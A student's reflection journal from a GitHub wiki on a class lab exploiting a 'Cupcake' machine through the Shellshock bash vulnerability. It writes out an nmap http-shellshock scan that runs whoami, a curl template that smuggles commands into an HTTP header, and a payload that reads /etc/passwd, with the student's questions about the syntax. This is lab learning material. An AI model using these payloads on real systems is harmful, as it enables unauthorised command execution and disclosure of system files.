Activity 4.1 Exploiting Cupcake Reflection Journal - Foren-Ken/tech-journal GitHub Wiki

The largest issue I encountered during this lab was applying the Shellshock vulnerability onto the HTTP header. I somewhat understood how it worked normally, but the implementation seemed to be counterintuitive. The following command is how we checked for the vulnerability. I do hope we use the similar --script flag to discover more in the class. sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /user/bin/whoami" [IP ADDRESS]

When it came down to the basic syntax to interact with the server: curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' http://host/[Vulnerable Area]

I don't understand why multiple options are chosen, but I do understand they're necessary to work.

1. "-s" passes an argument into a parameter, but I am unsure why it is used in this.
2. "echo ; echo ;" I didn't think echos would be necessary, but it seems to act like a buffer, but I am unsure if that's true
3. "/bin/echo "$(< /etc/passwd)"" is one of the multiple [location of command] [argument(s)] I utilized, but I don't understand why echo requires a very unorthodox input to show the value of passwd.